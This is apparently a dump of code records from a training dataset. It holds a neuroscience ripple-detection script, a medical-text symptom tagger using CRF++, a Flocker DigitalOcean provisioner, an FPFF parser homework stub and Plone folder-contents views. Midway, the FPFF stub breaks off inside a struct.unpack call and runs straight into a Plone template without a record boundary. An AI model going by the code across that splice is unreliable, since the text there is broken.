loadAuxiliary(data_directory)\n\nsws_ep\t\t\t\t\t\t\t\t= loadEpoch(data_directory, 'sws')\n\n# tuning_curves \t\t\t\t\t\t= computeAngularTuningCurves(spikes, position['ry'], wake_ep, 60)\ntuning_curves, velocity, edges \t\t= computeLMNAngularTuningCurves(spikes, position['ry'], wake_ep, 61)\nspatial_curves, extent\t\t\t\t= computePlaceFields(spikes, position[['x', 'z']], wake_ep, 20)\nautocorr_wake, frate_wake \t\t\t= compute_AutoCorrs(spikes, wake_ep)\nautocorr_sleep, frate_sleep \t\t= compute_AutoCorrs(spikes, sleep_ep)\nvelo_curves \t\t\t\t\t\t= computeAngularVelocityTuningCurves(spikes, position['ry'], wake_ep, nb_bins = 30, norm=False)\n# sys.exit()\n# mean_frate \t\t\t\t\t\t\t= computeMeanFiringRate(spikes, [wake_ep, sleep_ep], ['wake', 'sleep'])\nspeed_curves \t\t\t\t\t\t= computeSpeedTuningCurves(spikes, position[['x', 'z']], wake_ep)\n\n# downsampleDatFile(data_directory)\n\nfor i in tuning_curves:\n\ttuning_curves[i] = smoothAngularTuningCurves(tuning_curves[i], 10, 2)\n\nvelo_curves = velo_curves.rolling(window=5, win_type='gaussian', center= True, min_periods=1).mean(std = 1.0)\nspeed_curves = speed_curves.rolling(window=5, win_type='gaussian', center= True, min_periods=1).mean(std = 1.0)\n\t\t\n\nlfp \t\t= loadLFP(os.path.join(data_directory,data_directory.split('/')[-1]+'.eeg'), n_channels, 22, 1250, 'int16')\n\nfrequency = 1250.0\nlow_cut = 100\nhigh_cut = 300\nwindowLength = 51\nlow_thresFactor = 
1\nhigh_thresFactor = 5\nminRipLen = 20 # ms\nmaxRipLen = 200 # ms\nminInterRippleInterval = 20 # ms\nlimit_peak = 20\n\n\nsignal = butter_bandpass_filter(lfp.values, low_cut, high_cut, frequency, order = 4)\n\nsquared_signal = np.square(signal)\n\nwindow = np.ones(windowLength)/windowLength\n\nnSS = scipy.signal.filtfilt(window, 1, squared_signal)\n\n# Removing point above 100000\nnSS = pd.Series(index = lfp.index.values, data = nSS)\nnSS = nSS[nSS<200000]\n\nnSS = (nSS - np.mean(nSS))/np.std(nSS)\n\nsignal = pd.Series(index = lfp.index.values, data = signal)\n\n\n\nfigure()\nax = subplot(211)\nplot(nSS)\naxvline(3199825000)\nsubplot(212,sharex = ax)\nplot(lfp)\nshow()\n\n\n######################################################l##################################\n# Round1 : Detecting Ripple Periods by thresholding normalized signal\nthresholded = np.where(nSS > low_thresFactor, 1,0)\nstart = np.where(np.diff(thresholded) > 0)[0]\nstop = np.where(np.diff(thresholded) < 0)[0]\nif len(stop) == len(start)-1:\n\tstart = start[0:]\nif len(stop)-1 == len(start):\n\tstop = stop[1:]\n\n\n\n################################################################################################\n# Round 2 : Excluding ripples whose length < minRipLen and greater than Maximum Ripple Length\nif len(start):\n\tl = (nSS.index.values[stop] - nSS.index.values[start])/1000 # from us to ms\n\tidx = np.logical_and(l > minRipLen, l < maxRipLen)\nelse:\t\n\tprint(\"Detection by threshold failed!\")\n\tsys.exit()\n\nrip_ep = nts.IntervalSet(start = nSS.index.values[start[idx]], end = nSS.index.values[stop[idx]])\n\n####################################################################################################################\n# Round 3 : Merging ripples if inter-ripple period is too short\nrip_ep = rip_ep.merge_close_intervals(minInterRippleInterval/1000, time_units = 's')\n\n\n\n#####################################################################################################################\n# Round 4: Discard Ripples with a peak power < high_thresFactor and > limit_peak\nrip_max = []\nrip_tsd = []\nfor s, e in rip_ep.values:\n\ttmp = nSS.loc[s:e]\n\trip_tsd.append(tmp.idxmax())\n\trip_max.append(tmp.max())\n\nrip_max = np.array(rip_max)\nrip_tsd = np.array(rip_tsd)\n\ntokeep = np.logical_and(rip_max > high_thresFactor, rip_max < limit_peak)\n\nrip_ep = rip_ep[tokeep].reset_index(drop=True)\nrip_tsd = nts.Tsd(t = rip_tsd[tokeep], d = rip_max[tokeep])\n\n\n# # t1, t2 = (6002729000,6003713000)\n# t1, t2 = (6002700000,6003713000)\n# figure()\n# ax = subplot(211)\n# plot(lfp.loc[t1:t2])\n# plot(signal.loc[t1:t2])\n# plot(lfp.restrict(rip_ep).loc[t1:t2], '.')\n# subplot(212,sharex = ax)\n# plot(nSS.loc[t1:t2])\n# axhline(low_thresFactor)\n# show()\n\n\n\n\n###########################################################################################################\n# Writing for neuroscope\n\nrip_ep\t\t\t= sws_ep.intersect(rip_ep)\t\nrip_tsd \t\t= rip_tsd.restrict(sws_ep)\n\nstart = rip_ep.as_units('ms')['start'].values\n# peaks = rip_tsd.as_units('ms').index.values\nends = rip_ep.as_units('ms')['end'].values\n\ndatatowrite = np.vstack((start,ends)).T.flatten()\n\nn = len(rip_ep)\n\ntexttowrite = np.vstack(((np.repeat(np.array(['PyRip start 1']), n)), \n\t\t\t\t\t\t# (np.repeat(np.array(['PyRip peak 1']), n)),\n\t\t\t\t\t\t(np.repeat(np.array(['PyRip stop 1']), n))\n\t\t\t\t\t\t\t)).T.flatten()\n\nevt_file = data_directory+'/'+data_directory.split('/')[-1]+'.evt.py.rip'\nf = open(evt_file, 'w')\nfor t, n in 
zip(datatowrite, texttowrite):\n\tf.writelines(\"{:1.6f}\".format(t) + \"\\t\" + n + \"\\n\")\nf.close()\t\t\n\n\n\n\n","sub_path":"python/main_A14_detect_ripples.py","file_name":"main_A14_detect_ripples.py","file_ext":"py","file_size_in_byte":5429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"368391115","text":"\"\"\"Get data from event.\"\"\"\nimport typing\n\nimport numpy\nfrom numpy import ndarray\n\n\ndef get_image_from_event(\n event: typing.Dict[str, typing.Any],\n det_name: str\n) -> numpy.ndarray:\n \"\"\"Read the image data from the event. It will be converted to a numpy array.\n\n Parameters\n ----------\n event :\n The event document.\n\n det_name :\n The name of the key to the image. Usually, the detector name.\n\n Returns\n -------\n img :\n The two-dimensional image array.\n \"\"\"\n data = event['data'][det_name]\n return squeeze_to_image(data)\n\n\ndef squeeze_to_image(\n arr: typing.Union[list, ndarray],\n ndim: int = 2\n) -> ndarray:\n \"\"\"Squeeze the array to a 2d image array.\"\"\"\n arr1 = numpy.asarray(arr)\n img = numpy.squeeze(arr1)\n if img.ndim != ndim:\n raise ValueError(\"Invalid image dimension. Expect {} but this is {}\".format(ndim, img.ndim))\n return img\n","sub_path":"pdfstream/callbacks/from_event.py","file_name":"from_event.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"22579538","text":"# -*- encoding:utf-8 -*-\n'''\n input: a piece of text to be segmented\n output: the result is updated in temp/result_symptomDic.json --- the positions of the symptoms [json format]\n'''\nimport re\nimport subprocess\nimport sys\n\n\nROOT = '/nlp_api_ubuntu'\n\n\ndef read_lines(path):\n all_lines = []\n with open(path, 'r', encoding='utf-8') as file:\n temp_lines = file.readlines()\n for line in temp_lines:\n line = line.strip()\n if line:\n all_lines.append(line)\n return all_lines\n\n\ndef set_dta(keywords):\n p = []\n for word in keywords:\n ln = len(word)\n char = word[ln-1]\n if not (char in p):\n p.append(char)\n p = set(p)\n return p\n\n\npattern_sub= re.compile(' ')\ndef Dictest(line, view_dict_set,keywords):\n \n # Dictionary feature extraction (uses a reverse-order search algorithm)\n newline_flag = ('。', '!', '?')\n if line[-1] not in newline_flag:\n line = line + '。'\n line = pattern_sub.sub('_',line) # replace spaces etc. with '_'\n \n aresult = '/temp/test_Dic'\n fa = open(ROOT + aresult,'w',encoding='utf-8')\n word = []\n dic = []\n for w in line:\n word.append(w)\n dic.append('O') \n ln = len(word)\n i = ln\n j = 0\n le = []\n while i-j > 0:\n t = ''.join(word[i-1:i])\n if not (t in view_dict_set):\n j = 0\n i -= 1\n continue\n for k in range(1,min(10,ln+1)):\n if ''.join(word[i-k:i]) in keywords:\n le.append(k)\n if len(le) == 0:\n i = i-1\n if len(le) > 0:\n if len(le) == 1:\n if le[0] == 1:\n dic[i-1]='S-CAR'\n continue\n else:\n dic[i-le[0]]='B-CAR'\n for h in range(i-le[0]+1,i-1,1):\n dic[h]='I-CAR'\n dic[i-1]='E-CAR'\n i = i-le[0]\n le = []\n continue\n if len(le) == 2:\n if le[1] == 1:\n dic[i-1]='S-CAR'\n continue\n else:\n dic[i-le[1]]='B-CAR'\n for h in range(i-le[1]+1,i-1,1):\n dic[h]='I-CAR'\n dic[i-1]='E-CAR'\n i = i-le[1]\n le = []\n continue\n if len(le) > 2:\n if le[2] == 1:\n dic[i-1]='S-CAR'\n continue\n else:\n dic[i-le[2]]='B-CAR'\n for h in range(i-le[2]+1,i-1,1):\n dic[h]='I-CAR'\n dic[i-1]='E-CAR'\n i = i-le[2]\n le = []\n continue\n for m in range(len(word)):\n fa.write(word[m]+'\\t'+dic[m]+'\\n')\n fa.write('\\n')\n word = []\n dic = []\n\n\n\n#def crf_prodict():\n# # linux\n# crf_test_exe = 
sys.path[0]+'./crf_tool/crf_test '\n# model = ' -m '+sys.path[0]+'./model/Dic_model'\n# #run the test\n# test = ' '+sys.path[0]+'./temp/test_Dic'\n# output = ' '+sys.path[0]+'./temp/test_Dic_Result'\n# process = subprocess.Popen(crf_test_exe + model +test + ' >' + output, shell=True)\n# process.wait() # blocking\ndef crf_prodict():\n# # win\n# crf_test_exe = r'.\\crf_tool\\crf_test '\n# model = r' -m .\\model\\Dic_model'\n# #run the test\n# test = r' .\\temp\\test_Dic'\n# output = r' .\\temp\\test_Dic_Result'\n# process = subprocess.Popen(crf_test_exe + model +test + ' >' + output, shell=True)\n# process.wait() # blocking\n print('into function crf_predict') \n model = ROOT + '/model/Dic_model'\n #run the test\n test = ROOT + '/temp/test_Dic'\n output = ROOT + '/temp/test_Dic_Result'\n #tagger = CRFPP.Tagger(\"/opt/CRF++-0.58/crf_test\"+\" -m \" + model)\n #crf_segmenter(test, output, tagger)\n try:\n process = subprocess.Popen(\"/usr/local/bin/crf_test -m\" + model + ' ' + test + ' > ' + output, shell=True)\n process.wait() # blocking\n print('crf++ succeeded')\n except:\n print('crf++ failed')\n\n\n\ndef toJson():\n fout=open(ROOT + '/temp/result_symptomDic.json','w',encoding='utf-8')\n index=0\n fout.write('[')\n \n fin=open(ROOT + '/temp/test_Dic_Result','r',encoding='utf-8')\n Tlist=[]\n view=[]\n lines=fin.readlines()\n for line in lines:\n if line.strip():\n tag=line.strip().split()[2]\n Tlist.append(tag)\n SE = []\n for i in range(len(Tlist)):\n if Tlist[i] == 'S-CAR':\n SE.append(i)\n SE.append(i)\n view.append(SE)\n #index += 1\n SE = []\n if Tlist[i] == 'B-CAR':\n SE.append(i)\n if Tlist[i] == 'E-CAR':\n SE.append(i)\n view.append(SE)\n SE = []\n index+=len(view)\n fout.write('{\"View\":%s'%str(view)+'}')\n fout.write(']')\n fout.close()\n\ndef init(text):\n try:\n fVar = open(ROOT + '/dict/symptom.txt','r',encoding='utf-8')\n keywords = []\n ViewLines = fVar.readlines()\n for line in ViewLines:\n if line.strip():\n word = line.strip()\n keywords.append(word)\n \n view_dict_set = set_dta(keywords)\n Dictest(text, view_dict_set, keywords)\n crf_prodict() ## refresh the CRF++ prediction results\n toJson()\n return 1\n except:\n return 0\nif __name__ == '__main__':\n \n \n text = '患者腹胀较前减轻,咳嗽,咳痰,量少色白,质稀,发热,乏力好转,胃纳一般,二便调,夜寐尚可。查体:全身皮肤粘膜轻度黄染,无瘀斑瘀点,全身浅表淋巴结未扪及肿大,蜘蛛痣(+),肝掌(+)。巩膜黄染,腹膨隆,全腹无明显压痛、反跳痛、肌卫,肝肋下未及,脾脏肿大平脐,肝肾区叩痛(-),麦氏征(-),莫氏征(-),移动性浊音(+),肠鸣音不亢。四肢脊柱无红肿畸形,双下肢水肿。患者水肿较前加重,增加利尿剂剂量为速尿40mg qdpo,安体舒通80mg qdpo。补液后予拖拉塞米20mg 静推利尿减轻水肿。患者今晨发热38℃,咳嗽,咳痰,量少色白,质稀,予NS100ml+海西丁3.0g bid ivgtt抗感染,今补充诊断:肺部感染。患者舌红,苔黄腻,脉弦细予荆银合剂2瓶疏风清热。明晨急查血培养st!。患者尿常规示红细胞++,请肾病科会诊协助诊治。余治同前,继观。'\n \n print(init(text))\n\n\n\n","sub_path":"init_text_similar.py","file_name":"init_text_similar.py","file_ext":"py","file_size_in_byte":6574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"645326303","text":"# Copyright Hybrid Logic Ltd. 
See LICENSE file for details.\n\n\"\"\"\nDigitalOcean provisioner.\n\"\"\"\nimport time\nfrom functools import partial\n\nfrom ._libcloud import LibcloudProvisioner\nfrom ._install import (\n provision,\n task_install_digitalocean_kernel, DIGITALOCEAN_KERNEL,\n task_open_control_firewall\n)\nfrom ._common import Kernel\nfrom ._ssh import run_remotely\nfrom effect import Effect, Func\nfrom ._effect import sequence\n\n\ndef retry_on_error(error_checkers, callable, *args, **kwargs):\n \"\"\"\n This function repeats the API call if it raises an exception and if that\n exception is validated by any of the supplied checkers.\n It returns the result if the call eventually succeeds.\n\n :param error_checkers: A ``list`` of ``callables`` which will check for\n expected exceptions.\n :param callable: The API function to call.\n :param args: Positional arguments to supply when calling it.\n :param kwargs: Keyword arguments to supply when calling it.\n :return: The result of calling ``callable``.\n \"\"\"\n start_time = time.time()\n time_limit = 60\n while True:\n try:\n result = callable(*args, **kwargs)\n except Exception as e:\n for checker in error_checkers:\n if checker(e):\n # Checker matched go to sleep or time out\n break\n else:\n # None of the error_checkers matched.\n raise\n\n if time.time() - start_time < time_limit:\n time.sleep(1)\n else:\n raise Exception(\n 'Timed out waiting for successful API call. '\n 'Exception: {!r}, '\n 'Time Limit: {!r}s '.format(e, time_limit)\n )\n else:\n return result\n\n\ndef pending_event(exception):\n \"\"\"\n Check for a pending event exception.\n\n DigitalOceanV2 API only allows one change at a time and returns HTTP code\n 402 if another change is already pending.\n\n So this function repeats the API call if that error code is received and\n returns the result if the call eventually succeeds.\n\n The raw DO API returns ``event``s whose status can be queried, and that\n would be a better way to block before issuing the next API call, but\n pyocean doesn't consistently return the event info. E.g. 
droplet.create\n returns a ``droplet`` instance instead whose status is difficult to check.\n\n See https://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/4842992-allow-api-cal # noqa\n\n :param Exception exception: The exception that will be checked for type and\n message\n :return: ``True`` if ``exception`` matches else ``False``.\n \"\"\"\n # Import here, so that this can be added to ``flocker.provision`` without\n # having to install ``pyocean``.\n import pyocean\n\n if isinstance(exception, pyocean.exceptions.ClientError):\n if exception.message == 'Droplet already has a pending event.':\n return True\n return False\n\n\ndef droplet_still_on(exception):\n \"\"\"\n Check for a droplet still on exception.\n\n Shutdown returns the following event, indicating that the\n droplet has halted.\n\n {u'completed_at': u'2015-01-15T20:52:36Z',\n u'id': 41364967,\n u'region': u'ams3',\n u'resource_id': 3797602,\n u'resource_type': u'droplet',\n u'started_at': u'2015-01-15T20:52:31Z',\n u'status': u'completed',\n u'type': u'shutdown'}\n\n But it still seems to require some time before powering on, so catch the\n \"currently on\" exception and retry in that case.\n\n :param Exception exception: The exception that will be checked for type and\n message\n :return: ``True`` if ``exception`` matches else ``False``.\n \"\"\"\n # Import here, so that this can be added to ``flocker.provision`` without\n # having to install ``pyocean``.\n import pyocean\n\n if (isinstance(exception, pyocean.exceptions.ClientError)\n and exception.message == ('Droplet is currently on. '\n 'Please power it off to run this event.')):\n return True\n return False\n\n\ndef kernel_from_digitalocean_version(version):\n \"\"\"\n Parse a DigitalOcean kernel version string into its component parts.\n\n :param bytes version: The DigitalOcean kernel version string.\n :return: ``Kernel`` with version information.\n \"\"\"\n version, remaining = version.split('-', 1)\n release, distribution, architecture = remaining.split('.', 2)\n return Kernel(\n version=version,\n release=release,\n distribution=distribution,\n architecture=architecture\n )\n\n\nDIGITAL_OCEAN_KERNEL_VERSION_TEMPLATE = (\n '{version}-{release}.{distribution}.{architecture}'\n)\n\n\ndef kernel_to_digitalocean_version(kernel):\n \"\"\"\n Return a DigitalOcean style kernel string for the supplied ``Kernel``.\n\n :param Kernel kernel: The ``Kernel`` from which to get attributes for\n filling the template.\n :returns: A ``bytes`` DigitalOcean kernel label.\n \"\"\"\n return DIGITAL_OCEAN_KERNEL_VERSION_TEMPLATE.format(\n version=kernel.version,\n release=kernel.release,\n distribution=kernel.distribution,\n architecture=kernel.architecture\n )\n\n\ndef get_droplet_kernel(droplet, required_kernel):\n \"\"\"\n Search a droplet for a certain kernel and return a ``pyocean.Kernel`` which\n can then be used to reset the droplet's kernel.\n\n :param Kernel required_kernel: The kernel version to search for.\n :returns: A ``pyocean.Kernel`` instance corresponding to the supplied\n ``required_kernel``.\n \"\"\"\n full_version = kernel_to_digitalocean_version(required_kernel)\n for do_kernel in droplet.get_available_kernels():\n if do_kernel.version == full_version:\n return do_kernel\n else:\n raise ValueError('Unknown kernel', required_kernel)\n\n\ndef latest_droplet_kernel(droplet,\n required_distribution, required_architecture):\n \"\"\"\n Return the newest kernel available for the supplied droplet, with the given\n distribution and architecture.\n\n :param 
required_distribution: Only look for kernels for this distribution.\n :param required_architecture: Only look for kernels for this architecture.\n :return: A ``Kernel`` with the latest version information.\n \"\"\"\n matching_kernels = []\n for do_kernel in droplet.get_available_kernels():\n kernel = kernel_from_digitalocean_version(do_kernel.version)\n\n if ((required_distribution,\n required_architecture) == (kernel.distribution,\n kernel.architecture)):\n matching_kernels.append(kernel)\n\n if not matching_kernels:\n raise ValueError(\n 'No kernels for required distribution and architecture',\n required_distribution, required_architecture)\n\n latest_kernel = sorted(\n matching_kernels,\n key=lambda kernel: (kernel.version_tuple, kernel.release),\n reverse=True)[0]\n\n return latest_kernel\n\n\ndef change_kernel(node_id, token, kernel_version):\n \"\"\"\n Change the configured kernel on a DigitalOcean node.\n\n :param bytes node_id: The id of the DigitalOcean.\n :param bytes token: A DigitalOcean v2 API token.\n \"\"\"\n # Import here, so that this can be added to ``flocker.provision`` without\n # having to install ``pyocean``.\n import pyocean\n v2client = pyocean.DigitalOcean(access_token=token)\n v2droplet = v2client.droplet.get(node_id)\n do_kernel = get_droplet_kernel(v2droplet, kernel_version)\n\n retry_on_error(\n [pending_event],\n v2droplet.change_kernel, do_kernel.id)\n\n\ndef hard_reboot(node_id, token):\n \"\"\"\n Reboot a DigitalOcean node by powering it off and then back on.\n This is necessary for a new kernel to be selected.\n\n :param bytes node_id: The id of the DigitalOcean.\n :param bytes token: A DigitalOcean v2 API token.\n \"\"\"\n # Import here, so that this can be added to ``flocker.provision`` without\n # having to install ``pyocean``.\n import pyocean\n v2client = pyocean.DigitalOcean(access_token=token)\n v2droplet = v2client.droplet.get(node_id)\n\n # Libcloud doesn't support shutting down DO vms.\n # See https://issues.apache.org/jira/browse/LIBCLOUD-655\n retry_on_error(\n [pending_event],\n v2droplet.shutdown)\n\n # Libcloud doesn't support powering up DO vms.\n # See https://issues.apache.org/jira/browse/LIBCLOUD-655\n # Even after the shutdown, the droplet may not be quite ready to power on,\n # so also check for that resulting error here.\n retry_on_error([pending_event, droplet_still_on], v2droplet.power_on)\n\n\ndef provision_digitalocean(node, token,\n package_source, distribution, variants):\n \"\"\"\n Provision Flocker on this node.\n\n :param LibcloudNode node: The node to be provisioned.\n :param PackageSource package_source: The URL of the distribution package\n repository.\n :param bytes distribution: The label of the distribution to be installed on\n the node.\n :param bytes token: A DigitalOcean v2 API token.\n :param set variants: The set of variant configurations to use when\n provisioning\n \"\"\"\n # DO doesn't support booting the droplet's own kernel.\n # * http://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/2814988-give-option-to-use-the-droplet-s-own-bootloader # noqa\n # So rather than upgrade, we'll need to have new task to install the kernel\n # package (and headers) for the DO supported kernel.\n # The Fedora droplet default is to use a kernel that's too old for our\n # purposes.\n # Our documentation describes how to select a newer (DO supported) kernel\n # for this droplet.\n # Unfortunately this operation is only supported in the DO v2 API.\n # * 
\n\ndef provision_digitalocean(node, token,\n package_source, distribution, variants):\n \"\"\"\n Provision Flocker on this node.\n\n :param LibcloudNode node: The node to be provisioned.\n :param PackageSource package_source: The URL of the distribution package\n repository.\n :param bytes distribution: The label of the distribution to be installed on\n the node.\n :param bytes token: A DigitalOcean v2 API token.\n :param set variants: The set of variant configurations to use when\n provisioning\n \"\"\"\n # DO doesn't support booting the droplet's own kernel.\n # * http://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/2814988-give-option-to-use-the-droplet-s-own-bootloader # noqa\n # So rather than upgrade, we'll need to have a new task to install the kernel\n # package (and headers) for the DO supported kernel.\n # The Fedora droplet default is to use a kernel that's too old for our\n # purposes.\n # Our documentation describes how to select a newer (DO supported) kernel\n # for this droplet.\n # Unfortunately this operation is only supported in the DO v2 API.\n # * http://digitalocean.uservoice.com/forums/136585-digitalocean/suggestions/5618546-add-the-ability-to-change-kernel-via-api # noqa\n # * https://developers.digitalocean.com/#change-the-kernel\n # But libcloud only supports the DO v1 API\n # * https://www.digitalocean.com/community/questions/does-libcloud-work-with-digitalocean-s-v2-api # noqa\n # * https://issues.apache.org/jira/browse/JCLOUDS-613\n\n return sequence([\n # Change the configured kernel\n Effect(Func(\n lambda: change_kernel(node._node.id, token, DIGITALOCEAN_KERNEL)\n )),\n # Install the corresponding kernel package.\n run_remotely(\n username='root',\n address=node.address,\n commands=task_install_digitalocean_kernel()\n ),\n # Hard reboot the machine to boot into the new kernel.\n Effect(Func(\n lambda: hard_reboot(node._node.id, token)\n )),\n # Finally run all the standard Fedora20 installation steps.\n run_remotely(\n username='root',\n address=node.address,\n commands=sequence([\n provision(\n package_source=package_source,\n distribution=node.distribution,\n variants=variants,\n ),\n # https://clusterhq.atlassian.net/browse/FLOC-1550\n # This should be part of ._install.configure_cluster\n task_open_control_firewall()\n ]),\n ),\n ])\n\n\nIMAGE_NAMES = {\n # It'd be better to use image ID here, but the following code is currently\n # written to look up image names...which would normally be good for\n # readability but which in the case of DigitalOcean are pretty meaningless.\n 'fedora-20': '20 x64',\n}\n\n\ndef location_by_slug(driver, location_slug):\n \"\"\"\n Look up a DigitalOcean location by its short human readable \"slug\" code.\n\n # XXX: ``libcloud.DigitalOceanDriver.list_locations`` discards the slug\n # so we make a direct call to the v1 API and parse the returned dictionary.\n # See https://issues.apache.org/jira/browse/LIBCLOUD-653\n\n :param driver: The libcloud driver to query for locations.\n :param bytes location_slug: A DigitalOcean location \"slug\".\n :returns: ``NodeLocation``.\n \"\"\"\n result = driver.connection.request('/regions')\n for location_dict in result.object['regions']:\n if location_dict['slug'] == location_slug:\n break\n else:\n raise ValueError(\"Unknown location slug.\", location_slug)\n\n return driver._to_location(location_dict)\n\n\ndef size_by_slug(driver, size_slug):\n \"\"\"\n Look up a DigitalOcean size by its short human readable \"slug\" code.\n\n # XXX: ``libcloud.DigitalOceanDriver.list_sizes`` discards the slug\n # so we make a direct call to the v1 API and parse the returned dictionary.\n # See https://issues.apache.org/jira/browse/LIBCLOUD-654\n\n :param driver: The libcloud driver to query for sizes.\n :param bytes size_slug: A DigitalOcean size \"slug\".\n :returns: ``NodeSize``.\n \"\"\"\n result = driver.connection.request('/sizes')\n for size_dict in result.object['sizes']:\n if size_dict['slug'] == size_slug:\n return driver._to_size(size_dict)\n else:\n raise ValueError(\"Unknown size slug.\", size_slug)\n\n\ndef ssh_key_by_name(driver, ssh_key_name):\n \"\"\"\n Return the ``SSHKey`` with the given name.\n\n :param DigitalOceanDriver driver: The driver to use for issuing queries.\n :param bytes ssh_key_name: The name of a registered SSH key.\n :returns: ``SSHKey``\n \"\"\"\n for ssh_key in driver.ex_list_ssh_keys():\n if ssh_key.name == ssh_key_name:\n return ssh_key\n else:\n raise ValueError(\"Unknown SSH key name.\", ssh_key_name)\n\n\ndef digitalocean_provisioner(client_id, api_key, token, location, keyname):\n \"\"\"\n Create a LibCloudProvisioner for 
provisioning nodes on DigitalOcean.\n\n :param bytes client_id: A V1 API client ID.\n :param bytes api_key: A V1 API key.\n :param bytes token: A V2 API token.\n :param bytes location: The slug for the location in which new nodes will be\n created.\n :param bytes keyname: The name of an existing ssh public key configured in\n DigitalOcean. The provision step assumes the corresponding private key\n is available from an agent.\n \"\"\"\n # Import these here, so that this can be imported without\n # installing libcloud.\n from libcloud.compute.providers import get_driver, Provider\n\n driver_factory = get_driver(Provider.DIGITAL_OCEAN)\n driver = driver_factory(key=client_id, secret=api_key)\n ssh_key = ssh_key_by_name(driver, keyname)\n size = size_by_slug(driver, \"8gb\")\n\n def create_arguments(disk_size):\n \"\"\"\n :param int disk_size: Unused. DigitalOcean doesn't support arbitrary\n disk sizes.\n \"\"\"\n return {\n \"location\": location_by_slug(driver, location),\n # XXX: DigitalOcean driver doesn't use the standard ex_keyname\n # See https://clusterhq.atlassian.net/browse/FLOC-1228\n \"ex_ssh_key_ids\": [str(ssh_key.id)]\n }\n\n provisioner = LibcloudProvisioner(\n driver=driver,\n keyname=keyname,\n image_names=IMAGE_NAMES,\n create_node_arguments=create_arguments,\n # Tack the token on here because its not a standard part of the API.\n provision=partial(provision_digitalocean, token=token),\n default_size=size.id,\n )\n\n return provisioner\n","sub_path":"flocker/provision/_digitalocean.py","file_name":"_digitalocean.py","file_ext":"py","file_size_in_byte":15468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"624222789","text":"#!/usr/bin/env python2\n\nimport sys\nimport struct\nimport datetime\n\n# You can use this method to exit on failure conditions.\ndef bork(msg):\n sys.exit(msg)\n\n\n# Some constants. You shouldn't need to change these.\nMAGIC = 0xdeadbeef\nVERSION = 1\n\nif len(sys.argv) < 2:\n sys.exit(\"Usage: python2 stub.py input_file.fpff\")\n\n# Normally we'd parse a stream to save memory, but the FPFF files in this\n# assignment are relatively small.\nwith open(sys.argv[1], 'rb') as fpff:\n data = fpff.read()\n\n# Hint: struct.unpack will be VERY useful.\n# Hint: you might find it easier to use an index/offset variable than\n# hardcoding ranges like 0:8\nmagic, version, timestamp, author, section_count = struct.unpack(\"\n{% for (var i=0, file; file=o.files[i]; i++) { %}\n \n \n {%=file.name%}\n {%=o.formatFileSize(file.size)%}\n {% if (file.error) { %}\n \n \n {%=locale.messagefactory(locale.fileupload.error)%}\n {%=locale.messagefactory(locale.fileupload.errors[file.error]) || file.error%}\n \n {% } else if (o.files.valid && !i) { %}\n \n
\n \n {% if (!o.options.autoUpload) { %}\n \n {% } %}\n {% } else { %}\n \n {% } %}\n {% if (!i) { %}\n \n {% } %}\n \n{% } %}\n\n\n\n\"\"\"\n\n\ndef getOrdering(context):\n if IPloneSiteRoot.providedBy(context):\n return context\n else:\n ordering = context.getOrdering()\n if not IExplicitOrdering.providedBy(ordering):\n return None\n return ordering\n\n\nclass Move(BrowserView):\n def __call__(self):\n ordering = getOrdering(self.context)\n authenticator = getMultiAdapter((self.context, self.request),\n name=u\"authenticator\")\n if not authenticator.verify() or \\\n self.request['REQUEST_METHOD'] != 'POST':\n raise Unauthorized\n\n action = self.request.form.get('action')\n itemid = self.request.form.get('itemid')\n if action == 'movetop':\n ordering.moveObjectsToTop([itemid])\n elif action == 'movebottom':\n ordering.moveObjectsToBottom([itemid])\n elif action == 'movedelta':\n ordering.moveObjectsByDelta([itemid],\n int(self.request.form['delta']))\n return 'done'\n\n\nclass Sort(BrowserView):\n def __call__(self):\n authenticator = getMultiAdapter((self.context, self.request),\n name=u\"authenticator\")\n if not authenticator.verify() or \\\n self.request['REQUEST_METHOD'] != 'POST':\n raise Unauthorized\n ordering = getOrdering(self.context)\n catalog = getToolByName(self.context, 'portal_catalog')\n brains = catalog(path={\n 'query': '/'.join(self.context.getPhysicalPath()),\n 'depth': 1\n }, sort_on=self.request.form.get('on'))\n if self.request.form.get('reversed'):\n brains = [b for b in reversed(brains)]\n for idx, brain in enumerate(brains):\n ordering.moveObjectToPosition(brain.id, idx)\n self.request.response.redirect(\n '%s/folder_contents' % self.context.absolute_url())\n\n\nclass JUpload(BrowserView):\n \"\"\" We only support two kinds of file/image types, AT or DX based (in case\n that p.a.contenttypes is installed, and assuming their type names are\n 'File' and 'Image').\n \"\"\"\n def __call__(self):\n authenticator = getMultiAdapter((self.context, self.request),\n name=u\"authenticator\")\n if not authenticator.verify() or \\\n self.request['REQUEST_METHOD'] != 'POST':\n raise Unauthorized\n filedata = self.request.form.get(\"files[]\", None)\n if filedata is None:\n return\n filename = filedata.filename\n content_type = mimetypes.guess_type(filename)[0] or \"\"\n\n if not filedata:\n return\n\n # Determine if the default file/image types are DX or AT based\n ctr = getToolByName(self.context, 'content_type_registry')\n type_ = ctr.findTypeName(filename.lower(), '', '') or 'File'\n\n DX_BASED = False\n if HAS_DEXTERITY:\n pt = getToolByName(self.context, 'portal_types')\n if IDexterityFTI.providedBy(getattr(pt, type_)):\n factory = IDXFileFactory(self.context)\n DX_BASED = True\n else:\n factory = IATCTFileFactory(self.context)\n else:\n factory = IATCTFileFactory(self.context)\n\n obj = factory(filename, content_type, filedata)\n\n if DX_BASED:\n if 'File' in obj.portal_type:\n size = obj.file.getSize()\n content_type = obj.file.contentType\n elif 'Image' in obj.portal_type:\n size = obj.image.getSize()\n content_type = obj.image.contentType\n\n result = {\n \"url\": obj.absolute_url(),\n \"name\": obj.getId(),\n \"type\": content_type,\n \"size\": size\n }\n else:\n try:\n size = obj.getSize()\n except AttributeError:\n size = obj.getObjSize()\n\n result = {\n \"url\": obj.absolute_url(),\n \"name\": obj.getId(),\n \"type\": obj.getContentType(),\n \"size\": size\n }\n\n if 'Image' in obj.portal_type:\n result['thumbnail_url'] = result['url'] + '/@@images/image/tile'
